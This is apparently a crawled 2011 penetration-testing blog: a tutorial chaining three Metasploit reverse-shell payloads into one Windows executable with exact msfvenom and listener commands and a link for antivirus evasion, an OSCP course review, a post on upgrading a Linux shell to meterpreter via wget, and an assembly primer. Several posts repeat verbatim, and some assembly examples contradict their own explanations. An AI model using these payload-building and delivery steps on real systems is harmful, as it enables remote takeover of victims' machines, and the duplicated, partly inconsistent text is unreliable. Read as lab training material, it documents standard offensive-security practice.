Good day Good Sirs
Today is a quick example of using msfencode. This is strictly the way i use it, there are more than likely better ways and methods. But this works for me. Hopefully you enjoy it. So here goes..
All of you may have heard and or used msfpayload and msfencode. But what you may not be aware of is msfvenom. Which is basically a replacement for two. As said before, this is only the way i use it. So first thing first, by running the msfvenom with no commands, you are shown the help information. This is shown below.
Now as you see, there are many options. I personally first decide what payload im going to use, by opening another terminal and running msfpayload -l |grep "whatever your looking for" so for instance: ./msfpayload -l |grep windows/meterpreter/reverse Which would give you output as seen below.
Now as you can see, we have a few payloads to choose from. I will be using the windows/meterpreter/reverse_tcp
So moving back to the terminal with msfvenom, i would utilize the following commands, the commands will be explained below.
./msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.1.116 LPORT=4444 -f raw > /tmp/pay1
Command explanation:
-p: chosen payload
LHOST=: the listening host
LPORT=: the listening port
-f: the format that you want your payload to be encoded as
raw: the reason I have used this, is i have intentions of adding this payload along with another one. So we dont want it encoded just yet. So basically its staying as shellcode for the time being
> /tmp/pay1 : telling msfvenom where to store our payload for later use.
Now go on to decide what your next payload you will use will be. So refer back to the msfpayload terminal and chose your next payload. I will be using the windows/shell/reverse_tcp
so my next commands within the msfvenom terminal would be as follows.
./msfvenom -p windows/shell/reverse_tcp -f raw LHOST=192.168.1.116 LPORT=4443 -c /tmp/pay1 -k > /tmp/pay2
command explanation:
-p: the payload to use
-f: format to keep the payload in.
LHOST=: the listening host
LPORT=: the Listening port
-c: telling msfvenom that you want to combine extra shell code to the current payload. ensure you give full path to this shellcode"payload" to add.
-k: to keep the payload working by running it within another thread.
Now decide on a third payload. I do this by refering back to my msfpayload terminal and pick from there. I will be using the windows/shell/reverse_tcp_allports so the commands will look like below. Remember to pay attention, because now we will be adding the payloads together and having the format be an executable.
./msfvenom -p windows/meterpreter/reverse_tcp_allports -f exe LHOST=192.168.1.116 LPORT=2 -c /tmp/pay2 > /tmp/pay3.exe
commands explained:
-p: the payload to be used
-f: the format for your payload
LHOST=: the listening host.
LPORT=: the listening port.
-c: telling msfvenom to add some shell code. be sure to give full path to the shell code you wanna add.
below is a picture of all three commands in succession.
Now you have three payloads in one. So you will need to setup three listeners. What i do, is open up three terminals and load msfconsole using the commands as followed:
cd /pentest/exploits/framework
./msfconsole
Just doing that three times will get you three different msfconsole sessions. now to setup listeners. Pick a terminal and do the following.
use exploit/multi/handler
now tell it what to listen for. so our first payload had the following options so... just input these in with the following commands
set PAYLOAD windows/meterpreter/reverse_tcp
set LHOST 192.168.1.116 <----or whatever your LHOST will be
set LPORT 4444 <----or whatever your LPORT will be
show options <----just to check all your options are set correctly.
exploit <----if all options were set correctly, using the exploit command will set your listener to start listening.
Now a new msfconsole session for our second payload, using the commands as followed.
set PAYLOAD windows/shell/reverse_tcp
set LHOST 192.168.1.116 <----or whatever your LHOST will be
set LPORT 4443 <----or whatever your LPORT will be
show options <----just to check all your options are set correctly.
exploit <----if all options were set correctly, using the exploit command will set your listener to start listening.
Now onto listener three. In your thied msfconsole session input the following.
set PAYLOAD windows/meterpreter/reverse_tcp_allports
set LHOST 192.168.1.116 <----or whatever your LHOST will be
set LPORT 2 <----or whatever your LPORT will be
show options <----just to check all your options are set correctly.
exploit <----if all options were set correctly, using the exploit command will set your listener to start listening.
Now all thats left is to get your executable over to your victim. This would take imagination in a real world pentest. But since im only testing. I simple copy it over to my webserver and download the executable to my Virtual machine. Then run it. If all went well, you will get three seperate shells. This could certainly be useful in situations of, wanting to send a shell to different machines. IE you could have multiple LHOSTs. Or if your not sure what type of egress rulsets are in place. But all in all. Its an amazing feature. Now notice, i didnt do any encoding, to bypass AV. Thats because i will send you to a great write up on bypassing anti-virus using a simaliar method. So if you take my "guide by example" and the following guide from http://www.fuzzysecurity.com/tutorials/3.html you should see some great results. I hope you enjoyed this quickly put together post. Please feel free to tell me what youd like to see next. as always, goodnight and good luck.
http://www.fuzzysecurity.com/tutorials/3.html <---check this out for encoding and bypassing Anti-virus
Sunday, November 27, 2011
Saturday, November 12, 2011
OSCP Certified My Review and Bragging.
So if you know me, you know that i have been taking courses and certifications as fast as i can handle/afford. Well a while back i took the PWBv3 course from After alot of pain/studying/hacking/googling and torture from Muts and Subinacls, I finished the course, and took and passed the Exam. Script Alert("Applause"); /script
Well i have finally recieved my Certification in the mail...and if you want to see what it looks like, then there will be a link at the end of the post...So i thought i should give a quick rambling of my thoughts on the course. First, coming into the course your told that you can gain help by talking to folks and fellow students on the IRC channel #offsec. This is true and false... If you have a question about how to gain a shell via XSS or which metasploit exploit to use on a particular box..then my friend you just asked in the wrong channel. You will certainly get either "google it", "try harder", or no reply at all. This can be frustrating, but if you ask for an admin, and are having issues with the course material, or cant connect to a box, etc etc. Then Bolexx, Subinacls, sickn3ss or another admin will have your issues sorted within minutes. I honestly never had to wait more than a minute or two before i was answered and back to hacking.
Also, there is a forum that is private and only open to students, where there is a ton of info, external links, downloads, videos, guides, wiki links, and general student conversation...theres even an entire topic on music suggestions.
Along with the forum/IRC channel, there are the course videos/PDF that i think is over 8 hours of video and 400 pages of offensive-security ninja-fu.
The thing that i loved about this course is simple. I didnt have to setup a pentesting lab at my house, or just learn from the theory explained in the PDFs. Offensive-security provided me with an entire network to attack. Actually a network and three sub-networks. So as i learned new things and new attacks, i had a massive amount of systems to attack. Everything from windows 2k server to win7. I have heard rumor that there are some Macs hidden about, i unfortunately cant confirm this.
The course is extremely well covered. Basically Muts takes you from boot to root. Starting from just booting up backtrack to setting up services locally, to finally taking down services remotely. I would recommend this course to everyone who wants learn a bit about security and alot about yourself. As you will find out how deep down the rabbit hole you will go.
Also, another difference between this course and say CEH. The final exam isnt a 400 question written test. Its a 24 hour, active attack pentest on a network that is totally new to you. Basically, your given 24 hours to exploit a network, and record details of your findings. Just like a real pentest... the documentation is very important. After the 24 hours, you have another 24 hours to organize your data and send in the finding for review/grading. It is said that you Offsec can take up to three days to give your results, but i knew within 14 hours. In fact, i never had to wait long at all for a response from the folks at offsec.
Final thoughts: Anyone interested in being a Pentester, security-researcher, or just want to learn how your facebook or bank account gets hacked, and how to prevent it, should check this course out. Its intense, its pricey, but 100 percent worth it. I would take it again and again. In fact, i have already taken the Wifu course offered by Offensive-security. I will be giving a review of that also, as soon as i get around to it. As promised, here is the link of the certification if you want to see it.
Now go get it for yourself if you want to see it. ^^^ That is all you need to get started.
If you want to test your skills against the offsec team for free, then check this out.
Try your hand at that. and as always, goodnight and goodluck
-g11tch-
Well i have finally recieved my Certification in the mail...and if you want to see what it looks like, then there will be a link at the end of the post...So i thought i should give a quick rambling of my thoughts on the course. First, coming into the course your told that you can gain help by talking to folks and fellow students on the IRC channel #offsec. This is true and false... If you have a question about how to gain a shell via XSS or which metasploit exploit to use on a particular box..then my friend you just asked in the wrong channel. You will certainly get either "google it", "try harder", or no reply at all. This can be frustrating, but if you ask for an admin, and are having issues with the course material, or cant connect to a box, etc etc. Then Bolexx, Subinacls, sickn3ss or another admin will have your issues sorted within minutes. I honestly never had to wait more than a minute or two before i was answered and back to hacking.
Also, there is a forum that is private and only open to students, where there is a ton of info, external links, downloads, videos, guides, wiki links, and general student conversation...theres even an entire topic on music suggestions.
Along with the forum/IRC channel, there are the course videos/PDF that i think is over 8 hours of video and 400 pages of offensive-security ninja-fu.
The thing that i loved about this course is simple. I didnt have to setup a pentesting lab at my house, or just learn from the theory explained in the PDFs. Offensive-security provided me with an entire network to attack. Actually a network and three sub-networks. So as i learned new things and new attacks, i had a massive amount of systems to attack. Everything from windows 2k server to win7. I have heard rumor that there are some Macs hidden about, i unfortunately cant confirm this.
The course is extremely well covered. Basically Muts takes you from boot to root. Starting from just booting up backtrack to setting up services locally, to finally taking down services remotely. I would recommend this course to everyone who wants learn a bit about security and alot about yourself. As you will find out how deep down the rabbit hole you will go.
Also, another difference between this course and say CEH. The final exam isnt a 400 question written test. Its a 24 hour, active attack pentest on a network that is totally new to you. Basically, your given 24 hours to exploit a network, and record details of your findings. Just like a real pentest... the documentation is very important. After the 24 hours, you have another 24 hours to organize your data and send in the finding for review/grading. It is said that you Offsec can take up to three days to give your results, but i knew within 14 hours. In fact, i never had to wait long at all for a response from the folks at offsec.
Final thoughts: Anyone interested in being a Pentester, security-researcher, or just want to learn how your facebook or bank account gets hacked, and how to prevent it, should check this course out. Its intense, its pricey, but 100 percent worth it. I would take it again and again. In fact, i have already taken the Wifu course offered by Offensive-security. I will be giving a review of that also, as soon as i get around to it. As promised, here is the link of the certification if you want to see it.
Now go get it for yourself if you want to see it. ^^^ That is all you need to get started.
If you want to test your skills against the offsec team for free, then check this out.
Try your hand at that. and as always, goodnight and goodluck
-g11tch-
Saturday, November 5, 2011
Quick VLC Video
So like the title, a quick video with the stars being, VLC and Metasploit. As you can see, its exploitable. This attack is on a Windows XP SP3 machine using AVG anti-virus. The video is nothing special, as you will see, and not hear, there is no audio. I would rather work on my exploitation than my video editing skills. So hope you enjoy. Hopefully at the very least, you will look twice at whatever file your downloading from the net.
g11tch
g11tch
Sunday, September 11, 2011
FritzBox to *****Box
Just a quick and dirty video of a FritzBox attack. Forgive my lack of video editing skills. But im certain that the majority of us can appreciate the gritty view of this:
Please feel free to post a comment.
I would rather spend my time learning and pwning than editing the videos to make them more impressive. Although i intend fully to get into it, but since im studying for an exam retake. I thought this would be justified given my present schedule.
Please feel free to post a comment.
I would rather spend my time learning and pwning than editing the videos to make them more impressive. Although i intend fully to get into it, but since im studying for an exam retake. I thought this would be justified given my present schedule.
Thursday, September 1, 2011
Upgrading, coach to firstclass.
Hello all, and welcome back.
I have been forced to do alot of privledge escalation as of late. With windows, its a breeze, in my opinion anyways. But you give me a shell on a linux box, and I will need a map, an Iphone to Google from, and maybe even a direct link to Ms Chleo. Another words, im not very good at it.
So earlier I landed a shell via an old Tomcat vulnerability. A few ls and cd .. and cat commands later, Im thinking about how much I miss meterpreter. Thought for a moment and said I think Ill just give myself a Meterpreter session. So maybe this is common knowledge, maybe its not. Either way Im gonna give my method of doing this. Hopefully its helpful, informative, and at the very least, not boring for those taking the time to read my post. So here goes...
First i decided what kinda of session I wanted.
I prefer reverse_tcp
So I call up my old friend msfpayload, and tell it my prefered session.
msfpayload "payload type" "options" R | <----for raw format so that we can pipe it our other friend:
msfencode "options" "output name"
Now there are more than just one option of getting our payload onto our victim. I went the easier route, moved my encoded payload output to /var/www/ (on local machine ) so that i could start up Apache and just use a little wget magic and then had my payload onto the victim machine. Then its just a matter of a simple "chmod +x" then its ready to go. But before you execute your brand new meterpreter payload. Your going to need to setup a listener. SO fireup another msfconsole or background your current session. Obviously "exploit/multi/handler" is going to be your choice, so choose that. Then whatever your initial payload was, your going to want to add to your multi handler. So for the usual
set PAYLOAD "payload choice"
show options.... ***Ensure the options you set here, are the same that you used with msfpayload/msfencode****
Set the options. Now check your settings one last time to be on the safe side. If all is well, issue the "exploit" command.
Now youll see that your handler is started and listening. So now move back to your linux shell. Now you have a meterpreter payload, a listener/handler waiting for the connection. All thats left is to issue the command within your remote linux shell. Now look over to your handler... If all went well you should something along these lines :
Sending stage (1249280 bytes) to 192.168.1.119
[*] Meterpreter session 1 opened (192.168.1.102:4321 192.168.1.119:47566)
Now after a quick "sessions -l" youll get to see the session number. Issue another quick command, "sessions -i "number" " then youll get the upgraded view:
sf exploit(handler) > sessions -i 1
[*] Starting interaction with 1...
meterpreter > BinaryMischief
Now you have just been upgraded from coach to firstclass. I enjoy having the two seperate shells, it gives you the option to see the information from two different angles. Now i will take this moment to to say, im sorry to those who came here looking for an exact, step-by-step tutorial you could cut and paste, but after my cohort and I discussed it, we will not be posting exact step by step guides. But if you have any questions, comments or corrections, please leave a comment. I will discuss it with Pad and more than likely i will post your correction/s, The same day. Well thanks again for reading,.Try to give it a go. Have a good time.
I look forward to your comments. And please forgive my grammar.
Your friendly neighborhood
g11tch
I have been forced to do alot of privledge escalation as of late. With windows, its a breeze, in my opinion anyways. But you give me a shell on a linux box, and I will need a map, an Iphone to Google from, and maybe even a direct link to Ms Chleo. Another words, im not very good at it.
So earlier I landed a shell via an old Tomcat vulnerability. A few ls and cd .. and cat commands later, Im thinking about how much I miss meterpreter. Thought for a moment and said I think Ill just give myself a Meterpreter session. So maybe this is common knowledge, maybe its not. Either way Im gonna give my method of doing this. Hopefully its helpful, informative, and at the very least, not boring for those taking the time to read my post. So here goes...
First i decided what kinda of session I wanted.
I prefer reverse_tcp
So I call up my old friend msfpayload, and tell it my prefered session.
msfpayload "payload type" "options" R | <----for raw format so that we can pipe it our other friend:
msfencode "options" "output name"
Now there are more than just one option of getting our payload onto our victim. I went the easier route, moved my encoded payload output to /var/www/ (on local machine ) so that i could start up Apache and just use a little wget magic and then had my payload onto the victim machine. Then its just a matter of a simple "chmod +x" then its ready to go. But before you execute your brand new meterpreter payload. Your going to need to setup a listener. SO fireup another msfconsole or background your current session. Obviously "exploit/multi/handler" is going to be your choice, so choose that. Then whatever your initial payload was, your going to want to add to your multi handler. So for the usual
set PAYLOAD "payload choice"
show options.... ***Ensure the options you set here, are the same that you used with msfpayload/msfencode****
Set the options. Now check your settings one last time to be on the safe side. If all is well, issue the "exploit" command.
Now youll see that your handler is started and listening. So now move back to your linux shell. Now you have a meterpreter payload, a listener/handler waiting for the connection. All thats left is to issue the command within your remote linux shell. Now look over to your handler... If all went well you should something along these lines :
Sending stage (1249280 bytes) to 192.168.1.119
[*] Meterpreter session 1 opened (192.168.1.102:4321 192.168.1.119:47566)
Now after a quick "sessions -l" youll get to see the session number. Issue another quick command, "sessions -i "number" " then youll get the upgraded view:
sf exploit(handler) > sessions -i 1
[*] Starting interaction with 1...
meterpreter > BinaryMischief
Now you have just been upgraded from coach to firstclass. I enjoy having the two seperate shells, it gives you the option to see the information from two different angles. Now i will take this moment to to say, im sorry to those who came here looking for an exact, step-by-step tutorial you could cut and paste, but after my cohort and I discussed it, we will not be posting exact step by step guides. But if you have any questions, comments or corrections, please leave a comment. I will discuss it with Pad and more than likely i will post your correction/s, The same day. Well thanks again for reading,.Try to give it a go. Have a good time.
I look forward to your comments. And please forgive my grammar.
Your friendly neighborhood
g11tch
Saturday, August 20, 2011
Assembly Overview 1
--------
-Intro:
--------
Well since we're starting this blog I figured a good place to start is a simple overview on assembly and the high-level to low-level comparison. This is an article I wrote a couple years ago under a different handle but figured it got the point across so I would share it with you all. Without further ado, here is the good stuff.
------------
-Terminology
------------
Before we can just jump into the logic behind high-level to low-level conversions, we must first be familiarized with the instructions used in assembly language. Other articles cover certain ones, yet I felt the more important ones were over-looked; therefore here is a simplified list:
Conditional codes:
cmp --- Compare, simple enough, compares two values, whether they be variables, or constants.
je --- Jump if equal, will perform the jump if the preceding values are equal
jne --- Jump if not equal, performs the jump if values are not equal
jmp --- Unconditional jump, will jump regardless
Mathematical:
add, sub, mult, div --- Common sense, don't need an explanation
shl --- Shift to the left, performs a 'binary shift' to the left, which is equivalent to multiplying by 2
shr --- Shift to the right, performs another 'binary shift', which is dividing by 2
Calls:
calls require a bit of a note before I can introduce the actual instructions. Firstly, there are two types of commands, imported, and internal. Secondly, CALL instructions include prologues(the 'call' itself) and epilogues(a 'ret' instruction), which are what make them easily recognizable from a reversing point of view.
call codeaddress --- Sample of an internal function, where it will jump to the written address
call DWORD PTR [pointer] --- Sample of an external function, pointers are above the scope of this article, however it is enough to understand that it will jump to the code that the pointer points to, not the address of the pointer itself.
Registers:
If assembly language code were to access RAM every time it needed to store a variable or a value, then programs would run horrendously slow. To counter this, CPUs have their own internal memory, called registers. Typical IA-32 processors have 8 registers, all of which are generic. The functions of ESI, EDI, EBP, and ESP are unfortunately outside the scope of this article, however here is a list of those 8, and a list of their general use:
EAX, EBX, EDX --- Used for any integer/boolean/logical/memory operations
ECX --- Sometimes used as a counter, as those used in loops
ESI/EDI --- Used as source/destination pointers
EBP --- Used as a stack base counter
ESP --- Used as the CPU stack pointer
----------------
Logic: Branching
----------------
Ok, now that we've gotten the basics out of the way, let's move on to the actual logic. Ever wonder how high-level language statements are represented in assembly language? no? Well what are you doing reading this article! Suffice to say, assembly language is represented much more abstractly, and sometimes it may not be easy to recognize the similarities. However, I will attempt clarify the ambiguity, allowing you to recognize patterns, and then reconstruct the high-level code from the assembly language code.
** Single Branching **
Single branching refers to a fork, where when code reaches a point, it will either go in one direction, or the other. This is represented in high-level programming with an 'if' statement.
-- The high level representation --
if (variable == 10)
CallFunction();
-- Assembly language representation --
mov eax, [variable] ---> moves variable into eax
cmp eax, 10 ---> compares value with 10
jne Afterfunction ---> jumps to Afterfunction if not equal
call Function
Afterfunction ---> section it jumps to if not equal
As you can see, the code moves our inputted variable into eax, then will cmp eax with 10. Now if they are equal it will skip over the jne, and move to 'call Function', which will call up our function. If they are NOT equal however, once the code reaches 'jne Afterfunction', it will see that they are not equal, and jump to 'Afterfunction'.
** Two Way Conditional Branching **
Two way conditionals are similar to single branching. They are represented by an if-else statement in high-level coding.
-- The high level representation --
if (variable == 10)
Function();
else
OtherFunction();
-- Assembly language representation --
mov eax, [variable]
cmp eax, 10
jne OtherFunction
call Function
jmp AfterIfElse
call OtherFunction
AfterIfElse...
A quick summary about the assembly code: Moves our variable into eax, then compares it to 10. If it is not equal to 10, it will jump to 'call OtherFunction', which calls the respected function and then exits the conditional section. If it is equal to 10, it does not jump, moves on to 'call Function', which again calls the respected Function, then after the function is complete, returns, and unconditionally jumps out of the conditional section.
** Multiple-Alternative Branching **
This is essentially the same as two way, just instead of an else, it would be an else-if. I will therefore quickly go over this one and skip the summary.
-- The high level representation --
if (variable == 10)
Function();
else if (variable == 365)
OtherFunction();
-- Assembly language representation --
mov eax, [variable]
cmp eax, 10
jne OtherFunction
call Function
jmp Afterfunction
cmp eax, 365 ---> Where 'jne Otherfunction' jumps to
jne Afterfunction
call OtherFunction
Afterfunction...
** Compound Conditional Branching **
Compound Conditionals refer to when more than one condition must be satisfied before the condition is s
-- The high level representation --
if (variable == 10 &&
variable2 == 50)
Function();
-- Assembly language representation --
cmp [variable], 100
jne Afterfunction
cmp [variable2], 50
jne Afterfunction
call Function
Afterfunction...
The same kind of conditional can be built using OR's instead of AND's.
-- The high level representation --
if (variable == 10 ||
variable2 == 50)
Function();
-- Assembly language representation --
cmp [variable], 10
je Function
cmp [variable2], 50
je Function
jump Afterfunction
call Function
Afterfunction...
As you can see, the code checks if the first variable equals 10, and if it does, jumps to the 'call Function', disregarding the second variable. If, however, the first variable does not equal 10, then the code immediately check the second variable to see if it equals 50. If it is, it then jumps to the 'call Function'. Otherwise it then unconditionally jumps to after the function at Afterfunction.
-----------
Logic:Loops
-----------
Loops are an essential part of programming. Loops are essentially the same as the code we have been watching except that the code gets repeated. There are essentially two types of loops, Pre-tested loops, and Post-tested loops. As their names indicate, pre-tested check the conditions before the code is executed, and post-tested execute the code first, then check the conditions.
** Pre-Tested Loop **
Pre-tested loops are slightly less efficient then post-tested loops in the fact that they need two jumps: a conditional branch in the beginning, and an unconditional jump at the end that jumps back to the beginning.
-- The high level representation --
a = 0
while (a < 100)
{
array[a] = a;
c++;
}
-- Assembly language representation --
mov ecx, DWORD PTR [array]
xor eax,eax ---> xor's eax to zero
mov DWORD PTR [ecx+eax*4], eax ----> beginning of loop
add eax, 1
cmp eax, 100
jl ------------------> Jumps to beginning of loop if lower then 100
Ok, this code needs a bit of explaining. Firstly, you might be wondering why the conditional is at the beginning in the high-level code, yet at the end of the assembly language code? That is actually due to the compiler. It is slightly more efficient to put the test at the end of the code, since it will not require an unconditional JMP, so the compiler moved it there. I will go more in-depth later in the article. What the code is doing is firstly XORing eax, which is setting it to zero. Then the code will execute the loop, ADD 1 to eax, which is our counter. It will then CMP our counter to 100, and if it is less it will jump back to the beginning of the loop, essentially continuing until it reaches 100, where it will then exit the loop.
** Post-Tested Loop **
If a compiler already produces a post-tested loop from a pre-tested loop, you may be asking yourself what the compiler will do with a post-tested loop. If you answered "They would essentially be the same" you are right! The compiler basically re-arranges the code to make it the most efficient. So a sample would look like:
-- The high level representation --
c=1;
do
{
array[a] = c;
c++;
} while (c < 100);
-- Assembly language representation --
mov ecx, DWORD PTR [array]
mov DWORD PTR [ecx+eax*4], eax ----> beginning of loop
add eax, 1
cmp eax, 100
jl ------------------> Jumps if lower then 100
As you can see the only difference is that there is no XORing involved in the post-tested. Since the Pre-tested loop's conditional statement was moved to the end, the compiler added the XOR function to make sure 'a' was within the boundaries of the conditional. The only difference with the post-tested is that in the post-tested the code will run at least once, no matter what a is set as, therefore there is no need to modify a.
----------
Efficiency
----------
The code you have seen so far in this article is only one of many ways of interpreting a high-level language. The style is mostly dependent on the compiler you use, however most compilers will strive to achieve the highest efficiency. Efficiency can be accomplished by either generating the smallest possible program binaries, or the most high high-performance code possible. In this section I'll give examples of such Optimization.
Mathematically:
Multiplication and Division are considered 'Complex' operations by the CPU. To compensate for that, the CPU will perform a series of 'Simpler' operations. Although there may be many more operations to get the equivalent result, the net result will still be faster than the slower multiplication and division.
** Multiplication **
A sample of multiplying a variable by 32 in an efficient way:
lea eax, DWORD PTR [edx+edx] ----> lea is what the processor uses to make quick additions and shifts
add eax, eax
add eax, eax
add eax, eax
add eax, eax
As you can see, the first line will add your variable which is stored in edx with itself, then store the result in eax. Then the code will add eax with itself 4 times, resulting in 32 times the original edx value.
** Division **
Division is by far the slowest of the arithmical operations of a processor. Division is upwards 50 cycles slower then Addition and Subtraction, each of which is less than 1 cycle. As a result, the CPU treats divisions differently and attempts to streamline this operation using 'Reciprocal Division'. This is not ALWAYS possible, as is the case with unknown divisors, however whenever possible, reciprocal division is sought after. An example of a typical reciprocal-division that is dividing our value by 3 is:
mov ecx, eax ---> moves our number into ecx
mov eax ,0xaaaaaaab ---> moves 2/3 into eax
mul ecx ---> multiplies ecx by eax, so our value * (2/3)
shr edx, 2 ---> then divides our value by 2, so value * (2/3) / 2 = value * (1/3)
mov eax, edx ---> then moves our divided value back into eax
What is that 0xaaaaaab you might be asking? Well that is how Reciprocal-Division is used. In the above code, the function is dividing the value by 3. It is combining a reciprocal 0xaaaaaab, whose value in fractional is 2/3, with another divisor of 2, which comes out to being divided by 3. (2/3) / 2 = (1/3). Combining a fraction with a simple divisor, such as a binary shift, the CPU can create a division as efficiently as possible.
Branching Optimization:
** Branching **
Optimization and efficiency aren't only restricted to mathematical operations. Code segments such as branching can also be modified to operate more efficiently. The following is an example of more efficient/less efficient using a simple IF-OR statement like the one shown earlier in the article.
--- less efficient ---
cmp [variable], 10
je Function
cmp [variable2], 365
je Function
jmp Afterfunction
Call Function
Afterfunction...
--- more efficient ---
cmp [variable], 100
je Function
cmp [variable2], 365
jne Afterfunction
call Function
Afterfunction...
As you can see both codes execute the same branching conditional, however the section on the right has less instructions, and is therefore more efficient. The same can be said for pretty much all sections of code, there is almost always a way to make the code more efficient.
And that's it for the first installation. Hopefully you all enjoyed it. Comments and suggestions are welcome. Until next time,
padraignix
-Intro:
--------
Well since we're starting this blog I figured a good place to start is a simple overview on assembly and the high-level to low-level comparison. This is an article I wrote a couple years ago under a different handle but figured it got the point across so I would share it with you all. Without further ado, here is the good stuff.
------------
-Terminology
------------
Before we can just jump into the logic behind high-level to low-level conversions, we must first be familiarized with the instructions used in assembly language. Other articles cover certain ones, yet I felt the more important ones were over-looked; therefore here is a simplified list:
Conditional codes:
cmp --- Compare, simple enough, compares two values, whether they be variables, or constants.
je --- Jump if equal, will perform the jump if the preceding values are equal
jne --- Jump if not equal, performs the jump if values are not equal
jmp --- Unconditional jump, will jump regardless
Mathematical:
add, sub, mult, div --- Common sense, don't need an explanation
shl --- Shift to the left, performs a 'binary shift' to the left, which is equivalent to multiplying by 2
shr --- Shift to the right, performs another 'binary shift', which is dividing by 2
Calls:
calls require a bit of a note before I can introduce the actual instructions. Firstly, there are two types of commands, imported, and internal. Secondly, CALL instructions include prologues(the 'call' itself) and epilogues(a 'ret' instruction), which are what make them easily recognizable from a reversing point of view.
call codeaddress --- Sample of an internal function, where it will jump to the written address
call DWORD PTR [pointer] --- Sample of an external function, pointers are above the scope of this article, however it is enough to understand that it will jump to the code that the pointer points to, not the address of the pointer itself.
Registers:
If assembly language code were to access RAM every time it needed to store a variable or a value, then programs would run horrendously slow. To counter this, CPUs have their own internal memory, called registers. Typical IA-32 processors have 8 registers, all of which are generic. The functions of ESI, EDI, EBP, and ESP are unfortunately outside the scope of this article, however here is a list of those 8, and a list of their general use:
EAX, EBX, EDX --- Used for any integer/boolean/logical/memory operations
ECX --- Sometimes used as a counter, as those used in loops
ESI/EDI --- Used as source/destination pointers
EBP --- Used as a stack base counter
ESP --- Used as the CPU stack pointer
----------------
Logic: Branching
----------------
Ok, now that we've gotten the basics out of the way, let's move on to the actual logic. Ever wonder how high-level language statements are represented in assembly language? no? Well what are you doing reading this article! Suffice to say, assembly language is represented much more abstractly, and sometimes it may not be easy to recognize the similarities. However, I will attempt clarify the ambiguity, allowing you to recognize patterns, and then reconstruct the high-level code from the assembly language code.
** Single Branching **
Single branching refers to a fork, where when code reaches a point, it will either go in one direction, or the other. This is represented in high-level programming with an 'if' statement.
-- The high level representation --
if (variable == 10)
CallFunction();
-- Assembly language representation --
mov eax, [variable] ---> moves variable into eax
cmp eax, 10 ---> compares value with 10
jne Afterfunction ---> jumps to Afterfunction if not equal
call Function
Afterfunction ---> section it jumps to if not equal
As you can see, the code moves our inputted variable into eax, then will cmp eax with 10. Now if they are equal it will skip over the jne, and move to 'call Function', which will call up our function. If they are NOT equal however, once the code reaches 'jne Afterfunction', it will see that they are not equal, and jump to 'Afterfunction'.
** Two Way Conditional Branching **
Two way conditionals are similar to single branching. They are represented by an if-else statement in high-level coding.
-- The high level representation --
if (variable == 10)
Function();
else
OtherFunction();
-- Assembly language representation --
mov eax, [variable]
cmp eax, 10
jne OtherFunction
call Function
jmp AfterIfElse
call OtherFunction
AfterIfElse...
A quick summary about the assembly code: Moves our variable into eax, then compares it to 10. If it is not equal to 10, it will jump to 'call OtherFunction', which calls the respected function and then exits the conditional section. If it is equal to 10, it does not jump, moves on to 'call Function', which again calls the respected Function, then after the function is complete, returns, and unconditionally jumps out of the conditional section.
** Multiple-Alternative Branching **
This is essentially the same as two way, just instead of an else, it would be an else-if. I will therefore quickly go over this one and skip the summary.
-- The high level representation --
if (variable == 10)
Function();
else if (variable == 365)
OtherFunction();
-- Assembly language representation --
mov eax, [variable]
cmp eax, 10
jne OtherFunction
call Function
jmp Afterfunction
cmp eax, 365 ---> Where 'jne Otherfunction' jumps to
jne Afterfunction
call OtherFunction
Afterfunction...
** Compound Conditional Branching **
Compound Conditionals refer to when more than one condition must be satisfied before the condition is s
-- The high level representation --
if (variable == 10 &&
variable2 == 50)
Function();
-- Assembly language representation --
cmp [variable], 100
jne Afterfunction
cmp [variable2], 50
jne Afterfunction
call Function
Afterfunction...
The same kind of conditional can be built using OR's instead of AND's.
-- The high level representation --
if (variable == 10 ||
variable2 == 50)
Function();
-- Assembly language representation --
cmp [variable], 10
je Function
cmp [variable2], 50
je Function
jump Afterfunction
call Function
Afterfunction...
As you can see, the code checks if the first variable equals 10, and if it does, jumps to the 'call Function', disregarding the second variable. If, however, the first variable does not equal 10, then the code immediately check the second variable to see if it equals 50. If it is, it then jumps to the 'call Function'. Otherwise it then unconditionally jumps to after the function at Afterfunction.
-----------
Logic:Loops
-----------
Loops are an essential part of programming. Loops are essentially the same as the code we have been watching except that the code gets repeated. There are essentially two types of loops, Pre-tested loops, and Post-tested loops. As their names indicate, pre-tested check the conditions before the code is executed, and post-tested execute the code first, then check the conditions.
** Pre-Tested Loop **
Pre-tested loops are slightly less efficient then post-tested loops in the fact that they need two jumps: a conditional branch in the beginning, and an unconditional jump at the end that jumps back to the beginning.
-- The high level representation --
a = 0
while (a < 100)
{
array[a] = a;
c++;
}
-- Assembly language representation --
mov ecx, DWORD PTR [array]
xor eax,eax ---> xor's eax to zero
mov DWORD PTR [ecx+eax*4], eax ----> beginning of loop
add eax, 1
cmp eax, 100
jl ------------------> Jumps to beginning of loop if lower then 100
Ok, this code needs a bit of explaining. Firstly, you might be wondering why the conditional is at the beginning in the high-level code, yet at the end of the assembly language code? That is actually due to the compiler. It is slightly more efficient to put the test at the end of the code, since it will not require an unconditional JMP, so the compiler moved it there. I will go more in-depth later in the article. What the code is doing is firstly XORing eax, which is setting it to zero. Then the code will execute the loop, ADD 1 to eax, which is our counter. It will then CMP our counter to 100, and if it is less it will jump back to the beginning of the loop, essentially continuing until it reaches 100, where it will then exit the loop.
** Post-Tested Loop **
If a compiler already produces a post-tested loop from a pre-tested loop, you may be asking yourself what the compiler will do with a post-tested loop. If you answered "They would essentially be the same" you are right! The compiler basically re-arranges the code to make it the most efficient. So a sample would look like:
-- The high level representation --
c=1;
do
{
array[a] = c;
c++;
} while (c < 100);
-- Assembly language representation --
mov ecx, DWORD PTR [array]
mov DWORD PTR [ecx+eax*4], eax ----> beginning of loop
add eax, 1
cmp eax, 100
jl ------------------> Jumps if lower then 100
As you can see the only difference is that there is no XORing involved in the post-tested. Since the Pre-tested loop's conditional statement was moved to the end, the compiler added the XOR function to make sure 'a' was within the boundaries of the conditional. The only difference with the post-tested is that in the post-tested the code will run at least once, no matter what a is set as, therefore there is no need to modify a.
----------
Efficiency
----------
The code you have seen so far in this article is only one of many ways of interpreting a high-level language. The style is mostly dependent on the compiler you use, however most compilers will strive to achieve the highest efficiency. Efficiency can be accomplished by either generating the smallest possible program binaries, or the most high high-performance code possible. In this section I'll give examples of such Optimization.
Mathematically:
Multiplication and Division are considered 'Complex' operations by the CPU. To compensate for that, the CPU will perform a series of 'Simpler' operations. Although there may be many more operations to get the equivalent result, the net result will still be faster than the slower multiplication and division.
** Multiplication **
A sample of multiplying a variable by 32 in an efficient way:
